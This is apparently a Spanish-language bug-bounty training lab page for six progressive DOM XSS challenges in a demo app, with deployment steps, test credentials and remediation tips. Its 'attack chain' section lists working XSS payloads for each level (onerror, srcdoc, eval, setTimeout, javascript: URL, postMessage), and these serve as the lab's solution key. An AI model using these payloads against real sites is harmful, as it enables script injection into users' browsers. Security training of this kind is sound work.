Accede a este lab
Entorno seguro y aislado
Crea una cuenta y suscríbete para acceder a todos los labs. Practica en un entorno real y seguro.
Hunters que lo han resuelto· 8
Logro que recibirás
Cuando resuelvas este lab desbloqueas este logro compartible
BBLABS.ESLab Resuelto
MediaVDP
// achievement_unlocked
6 Progressive DOM XSS Challenges
XSS
jun 2026
solved_by@gorkaMiembro desde mar 2026
bblabs.es// real bug bounty practice
Writeups de la comunidad
Credenciales
| Usuario | Contrasena | Rol |
|---|---|---|
| alice | password123 | user |
Despliegue
# Opcion 1: autodeploy
./autodeploy.sh
# Opcion 2: manual
docker compose up --build
# Acceder
http://localhost:1000
Compatible con macOS, Linux y Windows (Docker Desktop / WSL).
Para parar:
./autodeploy.sh destroy
# o: docker compose down -v
Contenido del Lab
La aplicacion
Chirp con 6 niveles de DOM XSS progresivos.
La vulnerabilidad
Cada nivel usa un source y sink diferente para inyectar XSS en el DOM del cliente sin pasar por el servidor.
Cadena de ataque
Nivel 1: #<img src=x onerror=alert(1)>
Nivel 2: ?data=<script>alert(1)</script> (srcdoc)
Nivel 3: ?expr=alert(1) (eval)\nNivel 4: ?delay=alert(1) (setTimeout)
Nivel 5: ?url=javascript:alert(1) (location)
Nivel 6: postMessage({html:'<img src=x onerror=alert(1)>'})
Solucion interactiva
Accede a /writeup dentro de la aplicacion para una guia paso a paso con botones interactivos.
Flag
(alert ejecutado en cada nivel)
Remediacion
- Nunca usar innerHTML con datos no confiables
- Evitar eval/setTimeout con strings
- Validar origenes en postMessage handlers
- Usar frameworks que escapan por defecto (React JSX)
